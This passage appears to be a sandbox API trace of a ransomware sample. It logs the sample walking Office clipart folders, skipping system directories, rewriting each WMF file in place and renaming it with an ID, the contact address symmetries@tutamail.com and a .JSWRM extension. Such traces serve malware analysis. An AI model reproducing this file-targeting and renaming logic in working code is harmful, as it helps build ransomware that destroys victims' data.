hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0079.163] CloseHandle (hObject=0x314) returned 1 [0079.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0079.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0079.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.164] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.165] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1efc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH02282_.WMF", cAlternateFileName="")) returned 1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2=".") returned 1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="..") returned 1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="...") returned 1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="windows") returned -1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="recovery") returned -1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="perflogs") returned -1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="documents and settings") returned 1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="system volume information") returned -1 [0079.165] lstrcmpiW (lpString1="HH02282_.WMF", lpString2="msocache") returned -1 [0079.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02282_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02282_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02282_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0079.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02282_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02282_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02282_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0079.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.166] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7932) returned 1 [0079.166] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ef0) returned 0x205850 [0079.166] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ef0, lpOverlapped=0x0) returned 1 [0079.168] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.168] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ef0, lpOverlapped=0x0) returned 1 [0079.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.168] CloseHandle (hObject=0x314) returned 1 [0079.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0079.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0079.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0079.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0079.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0079.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.168] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0079.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.169] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH02298_.WMF", cAlternateFileName="")) returned 1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2=".") returned 1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="..") returned 1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="...") returned 1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="windows") returned -1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="recovery") returned -1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="perflogs") returned -1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="documents and settings") returned 1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="system volume information") returned -1 [0079.169] lstrcmpiW (lpString1="HH02298_.WMF", lpString2="msocache") returned -1 [0079.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02298_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02298_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02298_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02298_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02298_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02298_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.170] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5552) returned 1 [0079.170] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15b0) returned 0x205850 [0079.170] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15b0, lpOverlapped=0x0) returned 1 [0079.172] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.172] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15b0, lpOverlapped=0x0) returned 1 [0079.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.172] CloseHandle (hObject=0x314) returned 1 [0079.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0079.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0079.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0079.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0079.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.172] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.173] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x136a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH02312_.WMF", cAlternateFileName="")) returned 1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2=".") returned 1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="..") returned 1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="...") returned 1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="windows") returned -1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="recovery") returned -1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="perflogs") returned -1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="documents and settings") returned 1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="system volume information") returned -1 [0079.173] lstrcmpiW (lpString1="HH02312_.WMF", lpString2="msocache") returned -1 [0079.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02312_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02312_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02312_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02312_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH02312_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH02312_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.174] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4970) returned 1 [0079.174] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x205850 [0079.174] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1360, lpOverlapped=0x0) returned 1 [0079.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.213] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1360, lpOverlapped=0x0) returned 1 [0079.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.213] CloseHandle (hObject=0x314) returned 1 [0079.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0079.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0079.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0079.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0079.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0079.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.214] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program 